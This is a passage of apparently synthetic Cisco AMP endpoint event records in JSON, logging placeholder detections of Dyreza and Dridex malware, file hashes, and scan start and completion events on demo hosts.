Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209670282280983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256434431328000,"timestamp":1610705241,"timestamp_nanoseconds":295000000,"date":"2021-01-15T10:07:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256434431328301","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900178000400,"timestamp":1610705238,"timestamp_nanoseconds":178000000,"date":"2021-01-15T10:07:18+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"GenericKD:Dyreza-tpd","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705238,"start_date":"2021-01-15T10:07:18+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb"},"parent":{"disposition":"Malicious","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209605857772000,"timestamp":1610705232,"timestamp_nanoseconds":855000000,"date":"2021-01-15T10:07:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209605857771542","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256391481655000,"timestamp":1610705231,"timestamp_nanoseconds":358000000,"date":"2021-01-15T10:07:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256391481655340","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"VyCoQwOmMNmrVgs.exe","file_path":"\\\\?\\C:\\Windows\\VyCoQwOmMNmrVgs.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"},"parent":{"process_id":2812,"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256391481655000,"timestamp":1610705231,"timestamp_nanoseconds":343000000,"date":"2021-01-15T10:07:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256391481655339","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Desktop\\D94038FDE7B0F343931DF8040B\\jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256391481655000,"timestamp":1610705231,"timestamp_nanoseconds":280000000,"date":"2021-01-15T10:07:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256391481655338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"VyCoQwOmMNmrVgs.exe","file_path":"\\\\?\\C:\\Windows\\VyCoQwOmMNmrVgs.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"},"parent":{"process_id":2812,"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256391481655000,"timestamp":1610705231,"timestamp_nanoseconds":249000000,"date":"2021-01-15T10:07:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256391481655337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Desktop\\D94038FDE7B0F343931DF8040B\\jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256387186688000,"timestamp":1610705230,"timestamp_nanoseconds":890000000,"date":"2021-01-15T10:07:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256387186688040","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Desktop\\D94038FDE7B0F343931DF8040B\\jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"},"parent":{"process_id":3652,"disposition":"Malicious","file_name":"webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256387186688000,"timestamp":1610705230,"timestamp_nanoseconds":875000000,"date":"2021-01-15T10:07:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256387186688039","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256387186688000,"timestamp":1610705230,"timestamp_nanoseconds":625000000,"date":"2021-01-15T10:07:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256387186688038","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256382891721000,"timestamp":1610705229,"timestamp_nanoseconds":658000000,"date":"2021-01-15T10:07:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256382891720741","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209575793000000,"timestamp":1610705225,"timestamp_nanoseconds":195000000,"date":"2021-01-15T10:07:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209575793000469","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364862671421000,"timestamp":1610705225,"timestamp_nanoseconds":350000000,"date":"2021-01-15T10:07:05+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\DVD Maker","clean":true,"scanned_files":9,"scanned_processes":0,"scanned_paths":2,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364858376454000,"timestamp":1610705224,"timestamp_nanoseconds":772000000,"date":"2021-01-15T10:07:04+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\DVD Maker"}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256331352113000,"timestamp":1610705217,"timestamp_nanoseconds":646000000,"date":"2021-01-15T10:06:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256331352113188","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209511368491000,"timestamp":1610705210,"timestamp_nanoseconds":812000000,"date":"2021-01-15T10:06:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209511368491028","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364793951945000,"timestamp":1610705209,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:06:49+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\Microsoft Games","clean":true,"scanned_files":30,"scanned_processes":0,"scanned_paths":14,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364789656977000,"timestamp":1610705208,"timestamp_nanoseconds":193000000,"date":"2021-01-15T10:06:48+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\Microsoft Games"}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256279812506000,"timestamp":1610705205,"timestamp_nanoseconds":634000000,"date":"2021-01-15T10:06:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256279812505635","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209481303720000,"timestamp":1610705203,"timestamp_nanoseconds":152000000,"date":"2021-01-15T10:06:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209481303719955","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209477008753000,"timestamp":1610705202,"timestamp_nanoseconds":138000000,"date":"2021-01-15T10:06:42+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209477008752658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256228272898000,"timestamp":1610705193,"timestamp_nanoseconds":996000000,"date":"2021-01-15T10:06:33+00:00","event_type":"Threat 